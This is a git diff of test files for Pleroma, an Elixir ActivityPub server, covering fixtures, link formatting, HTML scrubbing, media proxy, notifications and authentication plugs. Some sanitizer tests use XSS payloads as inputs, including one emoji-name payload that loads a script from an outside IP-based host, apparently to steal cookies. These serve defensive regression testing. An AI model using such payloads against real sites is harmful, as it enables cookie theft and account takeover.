+{"@context":["https://www.w3.org/ns/activitystreams","https://puckipedia.com/-/context"],"actor":"https://puckipedia.com/","id":"https://puckipedia.com/ur33-818k","object":{"attributedTo":{"endpoints":"https://puckipedia.com/#endpoints","followers":"https://puckipedia.com/followers","following":"https://puckipedia.com/following","icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/images/avatar.png"},"id":"https://puckipedia.com/","inbox":"https://puckipedia.com/inbox","kroeg:blocks":{"id":"https://puckipedia.com/blocks"},"liked":"https://puckipedia.com/liked","manuallyApprovesFollowers":false,"name":"HACKER TEEN PUCKIPEDIA 👩💻","outbox":"https://puckipedia.com/outbox","preferredUsername":"puckipedia","publicKey":{"id":"https://puckipedia.com/#key","owner":"https://puckipedia.com/","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvN05xIcFE0Qgany7Rht4\n0ZI5wu++IT7K5iSqRimBYkpoeHbVcT9RFlW+aWH/QJJW/YgZ7+LMr8AMCrKrwSpS\nCndyrpx4O4lZ3FNRLu7tbklh01rGZfE6R1SFfYBpvMvImc9nYT6iezYDbv6NkHku\no3aVhjql216XlA0OhIrqQme9sAdrLbjbMrTUS8douCTkDOX+JFj1ghHCqdYEMZJI\nOY9kovtgnqyxFLm0RsPGsO1+g/OVojqG+VqHz6O2lceaTVQLlnZ4gOhLVG1tVsA2\nRfXQK+R/VgXncYE+BlQVd/tcdGAz7CDL7PP3rP65gmARnafhGR96cCOi/KzlAXSO\nMwIDAQAB\n-----END PUBLIC KEY-----","type":[]},"summary":"<p>federated hacker teen<br/>\n[<a href=\"https://pronoun.is/she\">she</a>/<a href=\"https://pronoun.is/they\">they</a>]</p>","type":"Person","updated":"2017-12-19T16:56:29.7576707+00:00"},"content":"test","id":"https://puckipedia.com/ur33-818k/note","likes":"https://puckipedia.com/ur33-818k/note/likes","replies":"https://puckipedia.com/ur33-818k/note/replies","shares":"https://puckipedia.com/ur33-818k/note/shares","tag":{"href":"https://puckipedia.com/ur33-818k/note/hashtag","id":"https://puckipedia.com/ur33-818k/note/hashtag","name":"#test","type":"Hashtag"},"to":"https://www.w3.org/ns/activitystreams#Public","type":"Note"},"to":"https://www.w3.org/ns/activitystreams#Public","type":"Create"}
\ No newline at end of file diff --git a/test/fixtures/mastodon-post-activity.json b/test/fixtures/mastodon-post-activity.json index 693e0ce39..b91263431 100644 --- a/test/fixtures/mastodon-post-activity.json +++ b/test/fixtures/mastodon-post-activity.json @@ -21,7 +21,6 @@ "http://localtesting.pleroma.lol/users/lain" ], "id": "http://mastodon.example.org/users/admin/statuses/99512778738411822/activity", - "nickname": "lain", "object": { "atomUri": "http://mastodon.example.org/users/admin/statuses/99512778738411822", "attachment": [], diff --git a/test/fixtures/prismo-url-map.json b/test/fixtures/prismo-url-map.json new file mode 100644 index 000000000..4e2e2fd4a --- /dev/null +++ b/test/fixtures/prismo-url-map.json @@ -0,0 +1,65 @@ +{ + "id": "https://prismo.news/posts/83#Create", + "type": "Create", + "actor": [ + { + "type": "Person", + "id": "https://prismo.news/@mxb" + } + ], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "object": { + "id": "https://prismo.news/posts/83", + "type": "Article", + "name": "Introducing: Federated follows!", + "published": "2018-11-01T07:10:05Z", + "content": "We are more than thrilled to announce that Prismo now supports federated follows! It means you ca...", + "url": { + "type": "Link", + "mimeType": "text/html", + "href": "https://prismo.news/posts/83" + }, + "votes": 12, + "attributedTo": [ + { + "type": "Person", + "id": "https://prismo.news/@mxb" + } + ], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "tags": [ + { + "type": "Hashtag", + "href": "https://prismo.news/tags/prismo", + "name": "#prismo" + }, + { + "type": "Hashtag", + "href": "https://prismo.news/tags/prismodev", + "name": "#prismodev" + }, + { + "type": "Hashtag", + "href": "https://prismo.news/tags/meta", + "name": "#meta" + } + ], + "@context": [ + "https://www.w3.org/ns/activitystreams", + "https://w3id.org/security/v1", + { + "Hashtag": "as:Hashtag" + }, + { + "votes": { + "@id": "as:votes", + "@type": "@id" + } + } + ] + } +} diff --git a/test/formatter_test.exs b/test/formatter_test.exs index abbd7ac93..13084baa7 100644 --- a/test/formatter_test.exs +++ b/test/formatter_test.exs @@ -1,5 +1,6 @@ defmodule Pleroma.FormatterTest do alias Pleroma.Formatter + alias Pleroma.User use Pleroma.DataCase import Pleroma.Factory @@ -23,7 +24,7 @@ defmodule Pleroma.FormatterTest do text = "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla ." expected = - "Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a> ." + "Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a> ." assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -54,7 +55,7 @@ defmodule Pleroma.FormatterTest do text = "https://forum.zdoom.org/viewtopic.php?f=44&t=57087" expected = - "<a href=\"https://forum.zdoom.org/viewtopic.php?f=44&t=57087\">https://forum.zdoom.org/viewtopic.php?f=44&t=57087</a>" + "<a href=\"https://forum.zdoom.org/viewtopic.php?f=44&t=57087\">https://forum.zdoom.org/viewtopic.php?f=44&t=57087</a>" assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -75,7 +76,7 @@ defmodule Pleroma.FormatterTest do text = "https://en.wikipedia.org/wiki/Duff's_device" expected = - "<a href=\"https://en.wikipedia.org/wiki/Duff's_device\">https://en.wikipedia.org/wiki/Duff's_device</a>" + "<a href=\"https://en.wikipedia.org/wiki/Duff's_device\">https://en.wikipedia.org/wiki/Duff's_device</a>" assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -91,6 +92,13 @@ defmodule Pleroma.FormatterTest do expected = "<a href=\"xmpp:contact@hacktivis.me\">xmpp:contact@hacktivis.me</a>" assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected + + text = + "magnet:?xt=urn:btih:7ec9d298e91d6e4394d1379caf073c77ff3e3136&tr=udp%3A%2F%2Fopentor.org%3A2710&tr=udp%3A%2F%2Ftracker.blackunicorn.xyz%3A6969&tr=udp%3A%2F%2Ftracker.ccc.de%3A80&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=wss%3A%2F%2Ftracker.btorrent.xyz&tr=wss%3A%2F%2Ftracker.fastcast.nz&tr=wss%3A%2F%2Ftracker.openwebtorrent.com" + + expected = "<a href=\"#{text}\">#{text}</a>" + + assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected end end @@ -123,6 +131,53 @@ defmodule Pleroma.FormatterTest do assert expected_text == Formatter.finalize({subs, text}) end + + test "gives a replacement for user links when the user is using Osada" do + mike = User.get_or_fetch("mike@osada.macgirvin.com") + + text = "@mike@osada.macgirvin.com test" + + mentions = Formatter.parse_mentions(text) + + {subs, text} = Formatter.add_user_links({[], text}, mentions) + + assert length(subs) == 1 + Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + + expected_text = + "<span><a class='mention' href='#{mike.ap_id}'>@<span>mike</span></a></span> test" + + assert expected_text == Formatter.finalize({subs, text}) + end + + test "gives a replacement for single-character local nicknames" do + text = "@o hi" + o = insert(:user, %{nickname: "o"}) + + mentions = Formatter.parse_mentions(text) + + {subs, text} = Formatter.add_user_links({[], text}, mentions) + + assert length(subs) == 1 + Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + + expected_text = "<span><a class='mention' href='#{o.ap_id}'>@<span>o</span></a></span> hi" + assert expected_text == Formatter.finalize({subs, text}) + end + + test "does not give a replacement for single-character local nicknames who don't exist" do + text = "@a hi" + + mentions = Formatter.parse_mentions(text) + + {subs, text} = Formatter.add_user_links({[], text}, mentions) + + assert length(subs) == 0 + Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + + expected_text = "@a hi" + assert expected_text == Formatter.finalize({subs, text}) + end end describe ".parse_tags" do @@ -160,14 +215,39 @@ defmodule Pleroma.FormatterTest do text = "I love :moominmamma:" expected_result = - "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />" + "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />" assert Formatter.emojify(text) == expected_result end + test "it does not add XSS emoji" do + text = + "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):" + + custom_emoji = %{ + "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" => + "https://placehold.it/1x1" + } + + expected_result = + "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />" + + assert Formatter.emojify(text, custom_emoji) == expected_result + end + test "it returns the emoji used in the text" do text = "I love :moominmamma:" assert Formatter.get_emoji(text) == [{"moominmamma", "/finmoji/128px/moominmamma-128.png"}] end + + test "it returns a nice empty result when no emojis are present" do + text = "I love moominamma" + assert Formatter.get_emoji(text) == [] + end + + test "it doesn't die when text is absent" do + text = nil + assert Formatter.get_emoji(text) == [] + end end diff --git a/test/html_test.exs b/test/html_test.exs new file mode 100644 index 000000000..f7150759b --- /dev/null +++ b/test/html_test.exs @@ -0,0 +1,80 @@ +defmodule Pleroma.HTMLTest do + alias Pleroma.HTML + use Pleroma.DataCase + + @html_sample """ + <b>this is in bold</b> + <p>this is a paragraph</p> + this is a linebreak<br /> + this is an image: <img src="http://example.com/image.jpg"><br /> + <script>alert('hacked')</script> + """ + + @html_onerror_sample """ + <img src="http://example.com/image.jpg" onerror="alert('hacked')"> + """ + + describe "StripTags scrubber" do + test "works as expected" do + expected = """ + this is in bold + this is a paragraph + this is a linebreak + this is an image: + alert('hacked') + """ + + assert expected == HTML.strip_tags(@html_sample) + end + + test "does not allow attribute-based XSS" do + expected = "\n" + + assert expected == HTML.strip_tags(@html_onerror_sample) + end + end + + describe "TwitterText scrubber" do + test "normalizes HTML as expected" do + expected = """ + this is in bold + <p>this is a paragraph</p> + this is a linebreak<br /> + this is an image: <img src="http://example.com/image.jpg" /><br /> + alert('hacked') + """ + + assert expected == HTML.filter_tags(@html_sample, Pleroma.HTML.Scrubber.TwitterText) + end + + test "does not allow attribute-based XSS" do + expected = """ + <img src="http://example.com/image.jpg" /> + """ + + assert expected == HTML.filter_tags(@html_onerror_sample, Pleroma.HTML.Scrubber.TwitterText) + end + end + + describe "default scrubber" do + test "normalizes HTML as expected" do + expected = """ + <b>this is in bold</b> + <p>this is a paragraph</p> + this is a linebreak<br /> + this is an image: <img src="http://example.com/image.jpg" /><br /> + alert('hacked') + """ + + assert expected == HTML.filter_tags(@html_sample, Pleroma.HTML.Scrubber.Default) + end + + test "does not allow attribute-based XSS" do + expected = """ + <img src="http://example.com/image.jpg" /> + """ + + assert expected == HTML.filter_tags(@html_onerror_sample, Pleroma.HTML.Scrubber.Default) + end + end +end diff --git a/test/list_test.exs b/test/list_test.exs index da3b88024..19eef8f6b 100644 --- a/test/list_test.exs +++ b/test/list_test.exs @@ -90,4 +90,24 @@ defmodule Pleroma.ListTest do assert list_two in lists refute list_three in lists end + + test "getting own lists a given user belongs to" do + owner = insert(:user) + not_owner = insert(:user) + member_1 = insert(:user) + member_2 = insert(:user) + {:ok, owned_list} = Pleroma.List.create("owned", owner) + {:ok, not_owned_list} = Pleroma.List.create("not owned", not_owner) + {:ok, owned_list} = Pleroma.List.follow(owned_list, member_1) + {:ok, owned_list} = Pleroma.List.follow(owned_list, member_2) + {:ok, not_owned_list} = Pleroma.List.follow(not_owned_list, member_1) + {:ok, not_owned_list} = Pleroma.List.follow(not_owned_list, member_2) + + lists_1 = Pleroma.List.get_lists_account_belongs(owner, member_1.id) + assert owned_list in lists_1 + refute not_owned_list in lists_1 + lists_2 = Pleroma.List.get_lists_account_belongs(owner, member_2.id) + assert owned_list in lists_2 + refute not_owned_list in lists_2 + end end diff --git a/test/media_proxy_test.exs b/test/media_proxy_test.exs new file mode 100644 index 000000000..d71f9f13a --- /dev/null +++ b/test/media_proxy_test.exs @@ -0,0 +1,130 @@ +defmodule Pleroma.MediaProxyTest do + use ExUnit.Case + import Pleroma.Web.MediaProxy + + describe "when enabled" do + setup do + enabled = Pleroma.Config.get([:media_proxy, :enabled]) + + unless enabled do + Pleroma.Config.put([:media_proxy, :enabled], true) + on_exit(fn -> Pleroma.Config.put([:media_proxy, :enabled], enabled) end) + end + + :ok + end + + test "ignores invalid url" do + assert url(nil) == nil + assert url("") == nil + end + + test "ignores relative url" do + assert url("/local") == "/local" + assert url("/") == "/" + end + + test "ignores local url" do + local_url = Pleroma.Web.Endpoint.url() <> "/hello" + local_root = Pleroma.Web.Endpoint.url() + assert url(local_url) == local_url + assert url(local_root) == local_root + end + + test "encodes and decodes URL" do + url = "https://pleroma.soykaf.com/static/logo.png" + encoded = url(url) + + assert String.starts_with?( + encoded, + Pleroma.Config.get([:media_proxy, :base_url], Pleroma.Web.base_url()) + ) + + assert String.ends_with?(encoded, "/logo.png") + + assert decode_result(encoded) == url + end + + test "encodes and decodes URL without a path" do + url = "https://pleroma.soykaf.com" + encoded = url(url) + assert decode_result(encoded) == url + end + + test "encodes and decodes URL without an extension" do + url = "https://pleroma.soykaf.com/path/" + encoded = url(url) + assert String.ends_with?(encoded, "/path") + assert decode_result(encoded) == url + end + + test "encodes and decodes URL and ignores query params for the path" do + url = "https://pleroma.soykaf.com/static/logo.png?93939393939&bunny=true" + encoded = url(url) + assert String.ends_with?(encoded, "/logo.png") + assert decode_result(encoded) == url + end + + test "validates signature" do + secret_key_base = Pleroma.Config.get([Pleroma.Web.Endpoint, :secret_key_base]) + + on_exit(fn -> + Pleroma.Config.put([Pleroma.Web.Endpoint, :secret_key_base], secret_key_base) + end) + + encoded = url("https://pleroma.social") + + Pleroma.Config.put( + [Pleroma.Web.Endpoint, :secret_key_base], + "00000000000000000000000000000000000000000000000" + ) + + [_, "proxy", sig, base64 | _] = URI.parse(encoded).path |> String.split("/") + assert decode_url(sig, base64) == {:error, :invalid_signature} + end + + test "uses the configured base_url" do + base_url = Pleroma.Config.get([:media_proxy, :base_url]) + + if base_url do + on_exit(fn -> + Pleroma.Config.put([:media_proxy, :base_url], base_url) + end) + end + + Pleroma.Config.put([:media_proxy, :base_url], "https://cache.pleroma.social") + + url = "https://pleroma.soykaf.com/static/logo.png" + encoded = url(url) + + assert String.starts_with?(encoded, Pleroma.Config.get([:media_proxy, :base_url])) + end + end + + describe "when disabled" do + setup do + enabled = Pleroma.Config.get([:media_proxy, :enabled]) + + if enabled do + Pleroma.Config.put([:media_proxy, :enabled], false) + + on_exit(fn -> + Pleroma.Config.put([:media_proxy, :enabled], enabled) + :ok + end) + end + + :ok + end + + test "does not encode remote urls" do + assert url("https://google.fr") == "https://google.fr" + end + end + + defp decode_result(encoded) do + [_, "proxy", sig, base64 | _] = URI.parse(encoded).path |> String.split("/") + {:ok, decoded} = decode_url(sig, base64) + decoded + end +end diff --git a/test/notification_test.exs b/test/notification_test.exs index 2ca1ac13d..a36ed5bb8 100644 --- a/test/notification_test.exs +++ b/test/notification_test.exs @@ -1,7 +1,9 @@ defmodule Pleroma.NotificationTest do use Pleroma.DataCase alias Pleroma.Web.TwitterAPI.TwitterAPI + alias Pleroma.Web.CommonAPI alias Pleroma.{User, Notification} + alias Pleroma.Web.ActivityPub.Transmogrifier import Pleroma.Factory describe "create_notifications" do @@ -119,4 +121,253 @@ defmodule Pleroma.NotificationTest do assert Notification.for_user(third_user) != [] end end + + describe "set_read_up_to()" do + test "it sets all notifications as read up to a specified notification ID" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = + TwitterAPI.create_status(user, %{ + "status" => "hey @#{other_user.nickname}!" + }) + + {:ok, activity} = + TwitterAPI.create_status(user, %{ + "status" => "hey again @#{other_user.nickname}!" + }) + + [n2, n1] = notifs = Notification.for_user(other_user) + assert length(notifs) == 2 + + assert n2.id > n1.id + + {:ok, activity} = + TwitterAPI.create_status(user, %{ + "status" => "hey yet again @#{other_user.nickname}!" + }) + + Notification.set_read_up_to(other_user, n2.id) + + [n3, n2, n1] = notifs = Notification.for_user(other_user) + + assert n1.seen == true + assert n2.seen == true + assert n3.seen == false + end + end + + describe "notification target determination" do + test "it sends notifications to addressed users in new messages" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = + CommonAPI.post(user, %{ + "status" => "hey @#{other_user.nickname}!" + }) + + assert other_user in Notification.get_notified_from_activity(activity) + end + + test "it sends notifications to mentioned users in new messages" do + user = insert(:user) + other_user = insert(:user) + + create_activity = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "type" => "Create", + "to" => ["https://www.w3.org/ns/activitystreams#Public"], + "actor" => user.ap_id, + "object" => %{ + "type" => "Note", + "content" => "message with a Mention tag, but no explicit tagging", + "tag" => [ + %{ + "type" => "Mention", + "href" => other_user.ap_id, + "name" => other_user.nickname + } + ], + "attributedTo" => user.ap_id + } + } + + {:ok, activity} = Transmogrifier.handle_incoming(create_activity) + + assert other_user in Notification.get_notified_from_activity(activity) + end + + test "it does not send notifications to users who are only cc in new messages" do + user = insert(:user) + other_user = insert(:user) + + create_activity = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "type" => "Create", + "to" => ["https://www.w3.org/ns/activitystreams#Public"], + "cc" => [other_user.ap_id], + "actor" => user.ap_id, + "object" => %{ + "type" => "Note", + "content" => "hi everyone", + "attributedTo" => user.ap_id + } + } + + {:ok, activity} = Transmogrifier.handle_incoming(create_activity) + + assert other_user not in Notification.get_notified_from_activity(activity) + end + + test "it does not send notification to mentioned users in likes" do + user = insert(:user) + other_user = insert(:user) + third_user = insert(:user) + + {:ok, activity_one} = + CommonAPI.post(user, %{ + "status" => "hey @#{other_user.nickname}!" + }) + + {:ok, activity_two, _} = CommonAPI.favorite(activity_one.id, third_user) + + assert other_user not in Notification.get_notified_from_activity(activity_two) + end + + test "it does not send notification to mentioned users in announces" do + user = insert(:user) + other_user = insert(:user) + third_user = insert(:user) + + {:ok, activity_one} = + CommonAPI.post(user, %{ + "status" => "hey @#{other_user.nickname}!" + }) + + {:ok, activity_two, _} = CommonAPI.repeat(activity_one.id, third_user) + + assert other_user not in Notification.get_notified_from_activity(activity_two) + end + end + + describe "notification lifecycle" do + test "liking an activity results in 1 notification, then 0 if the activity is deleted" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.favorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + end + + test "liking an activity results in 1 notification, then 0 if the activity is unliked" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.favorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _, _, _} = CommonAPI.unfavorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "repeating an activity results in 1 notification, then 0 if the activity is deleted" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.repeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + end + + test "repeating an activity results in 1 notification, then 0 if the activity is unrepeated" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _, _} = CommonAPI.repeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 1 + + {:ok, _, _} = CommonAPI.unrepeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "liking an activity which is already deleted does not generate a notification" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + + {:error, _} = CommonAPI.favorite(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "repeating an activity which is already deleted does not generate a notification" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + + assert length(Notification.for_user(user)) == 0 + + {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + + assert length(Notification.for_user(user)) == 0 + + {:error, _} = CommonAPI.repeat(activity.id, other_user) + + assert length(Notification.for_user(user)) == 0 + end + + test "replying to a deleted post without tagging does not generate a notification" do + user = insert(:user) + other_user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + + {:ok, _reply_activity} = + CommonAPI.post(other_user, %{ + "status" => "test reply", + "in_reply_to_status_id" => activity.id + }) + + assert length(Notification.for_user(user)) == 0 + end + end end diff --git a/test/object_test.exs b/test/object_test.exs index 5eb9b7530..909605560 100644 --- a/test/object_test.exs +++ b/test/object_test.exs @@ -19,4 +19,34 @@ defmodule Pleroma.ObjectTest do {:error, _result} = Repo.insert(cs) end end + + describe "deletion function" do + test "deletes an object" do + object = insert(:note) + found_object = Object.get_by_ap_id(object.data["id"]) + + assert object == found_object + + Object.delete(found_object) + + found_object = Object.get_by_ap_id(object.data["id"]) + + refute object == found_object + end + + test "ensures cache is cleared for the object" do + object = insert(:note) + cached_object = Object.get_cached_by_ap_id(object.data["id"]) + + assert object == cached_object + + Object.delete(cached_object) + + {:ok, nil} = Cachex.get(:object_cache, "object:#{object.data["id"]}") + + cached_object = Object.get_cached_by_ap_id(object.data["id"]) + + refute object == cached_object + end + end end diff --git a/test/plugs/authentication_plug_test.exs b/test/plugs/authentication_plug_test.exs index 729ac8ae5..061fa0cac 100644 --- a/test/plugs/authentication_plug_test.exs +++ b/test/plugs/authentication_plug_test.exs @@ -4,196 +4,50 @@ defmodule Pleroma.Plugs.AuthenticationPlugTest do alias Pleroma.Plugs.AuthenticationPlug alias Pleroma.User - defp fetch_nil(_name) do - {:ok, nil} - end - - @user %User{ - id: 1, - name: "dude", - password_hash: Comeonin.Pbkdf2.hashpwsalt("guy") - } - - @deactivated %User{ - id: 1, - name: "dude", - password_hash: Comeonin.Pbkdf2.hashpwsalt("guy"), - info: %{"deactivated" => true} - } - - @session_opts [ - store: :cookie, - key: "_test", - signing_salt: "cooldude" - ] - - defp fetch_user(_name) do - {:ok, @user} - end - - defp basic_auth_enc(username, password) do - "Basic " <> Base.encode64("#{username}:#{password}") - end - - describe "without an authorization header" do - test "it halts the application" do - conn = - build_conn() - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> AuthenticationPlug.call(%{}) - - assert conn.status == 403 - assert conn.halted == true - end - - test "it assigns a nil user if the 'optional' option is used" do - conn = - build_conn() - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> AuthenticationPlug.call(%{optional: true}) - - assert %{user: nil} == conn.assigns - end - end - - describe "with an authorization header for a nonexisting user" do - test "it halts the application" do - conn = - build_conn() - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> AuthenticationPlug.call(%{fetcher: &fetch_nil/1}) - - assert conn.status == 403 - assert conn.halted == true - end - - test "it assigns a nil user if the 'optional' option is used" do - conn = - build_conn() - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> AuthenticationPlug.call(%{optional: true, fetcher: &fetch_nil/1}) + setup %{conn: conn} do + user = %User{ + id: 1, + name: "dude", + password_hash: Comeonin.Pbkdf2.hashpwsalt("guy") + } - assert %{user: nil} == conn.assigns - end - end - - describe "with an incorrect authorization header for a enxisting user" do - test "it halts the application" do - opts = %{ - fetcher: &fetch_user/1 - } - - header = basic_auth_enc("dude", "man") - - conn = - build_conn() - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> put_req_header("authorization", header) - |> AuthenticationPlug.call(opts) - - assert conn.status == 403 - assert conn.halted == true - end - - test "it assigns a nil user if the 'optional' option is used" do - opts = %{ - optional: true, - fetcher: &fetch_user/1 - } - - header = basic_auth_enc("dude", "man") - - conn = - build_conn() - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> put_req_header("authorization", header) - |> AuthenticationPlug.call(opts) + conn = + conn + |> assign(:auth_user, user) - assert %{user: nil} == conn.assigns - end + %{user: user, conn: conn} end - describe "with a correct authorization header for an existing user" do - test "it assigns the user", %{conn: conn} do - opts = %{ - optional: true, - fetcher: &fetch_user/1 - } + test "it does nothing if a user is assigned", %{conn: conn} do + conn = + conn + |> assign(:user, %User{}) - header = basic_auth_enc("dude", "guy") + ret_conn = + conn + |> AuthenticationPlug.call(%{}) - conn = - conn - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> put_req_header("authorization", header) - |> AuthenticationPlug.call(opts) - - assert %{user: @user} == conn.assigns - assert get_session(conn, :user_id) == @user.id - assert conn.halted == false - end - end - - describe "with a correct authorization header for an deactiviated user" do - test "it halts the appication", %{conn: conn} do - opts = %{ - optional: false, - fetcher: fn _ -> @deactivated end - } - - header = basic_auth_enc("dude", "guy") - - conn = - conn - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> put_req_header("authorization", header) - |> AuthenticationPlug.call(opts) - - assert conn.status == 403 - assert conn.halted == true - end + assert ret_conn == conn end - describe "with a user_id in the session for an existing user" do - test "it assigns the user", %{conn: conn} do - opts = %{ - optional: true, - fetcher: &fetch_user/1 - } - - header = basic_auth_enc("dude", "THIS IS WRONG") - - conn = - conn - |> Plug.Session.call(Plug.Session.init(@session_opts)) - |> fetch_session - |> put_session(:user_id, @user.id) - |> put_req_header("authorization", header) - |> AuthenticationPlug.call(opts) + test "with a correct password in the credentials, it assigns the auth_user", %{conn: conn} do + conn = + conn + |> assign(:auth_credentials, %{password: "guy"}) + |> AuthenticationPlug.call(%{}) - assert %{user: @user} == conn.assigns - assert get_session(conn, :user_id) == @user.id - assert conn.halted == false - end + assert conn.assigns.user == conn.assigns.auth_user end - describe "with an assigned user" do - test "it does nothing, returning the incoming conn", %{conn: conn} do - conn = - conn - |> assign(:user, @user) + test "with a wrong password in the credentials, it does nothing", %{conn: conn} do + conn = + conn + |> assign(:auth_credentials, %{password: "wrong"}) - conn_result = AuthenticationPlug.call(conn, %{}) + ret_conn = + conn + |> AuthenticationPlug.call(%{}) - assert conn == conn_result - end + assert conn == ret_conn end end diff --git a/test/plugs/basic_auth_decoder_plug_test.exs b/test/plugs/basic_auth_decoder_plug_test.exs new file mode 100644 index 000000000..a4876fef7 --- /dev/null +++ b/test/plugs/basic_auth_decoder_plug_test.exs @@ -0,0 +1,31 @@ +defmodule Pleroma.Plugs.BasicAuthDecoderPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.BasicAuthDecoderPlug + + defp basic_auth_enc(username, password) do + "Basic " <> Base.encode64("#{username}:#{password}") + end + + test "it puts the decoded credentials into the assigns", %{conn: conn} do + header = basic_auth_enc("moonman", "iloverobek") + + conn = + conn + |> put_req_header("authorization", header) + |> BasicAuthDecoderPlug.call(%{}) + + assert conn.assigns[:auth_credentials] == %{ + username: "moonman", + password: "iloverobek" + } + end + + test "without a authorization header it doesn't do anything", %{conn: conn} do + ret_conn = + conn + |> BasicAuthDecoderPlug.call(%{}) + + assert conn == ret_conn + end +end diff --git a/test/plugs/ensure_authenticated_plug_test.exs b/test/plugs/ensure_authenticated_plug_test.exs new file mode 100644 index 000000000..b32817fef --- /dev/null +++ b/test/plugs/ensure_authenticated_plug_test.exs @@ -0,0 +1,27 @@ +defmodule Pleroma.Plugs.EnsureAuthenticatedPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.EnsureAuthenticatedPlug + alias Pleroma.User + + test "it halts if no user is assigned", %{conn: conn} do + conn = + conn + |> EnsureAuthenticatedPlug.call(%{}) + + assert conn.status == 403 + assert conn.halted == true + end + + test "it continues if a user is assigned", %{conn: conn} do + conn = + conn + |> assign(:user, %User{}) + + ret_conn = + conn + |> EnsureAuthenticatedPlug.call(%{}) + + assert ret_conn == conn + end +end diff --git a/test/plugs/ensure_user_key_plug_test.exs b/test/plugs/ensure_user_key_plug_test.exs new file mode 100644 index 000000000..9beda838e --- /dev/null +++ b/test/plugs/ensure_user_key_plug_test.exs @@ -0,0 +1,25 @@ +defmodule Pleroma.Plugs.EnsureUserKeyPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.EnsureUserKeyPlug + + test "if the conn has a user key set, it does nothing", %{conn: conn} do + conn = + conn + |> assign(:user, 1) + + ret_conn = + conn + |> EnsureUserKeyPlug.call(%{}) + + assert conn == ret_conn + end + + test "if the conn has no key set, it sets it to nil", %{conn: conn} do + conn = + conn + |> 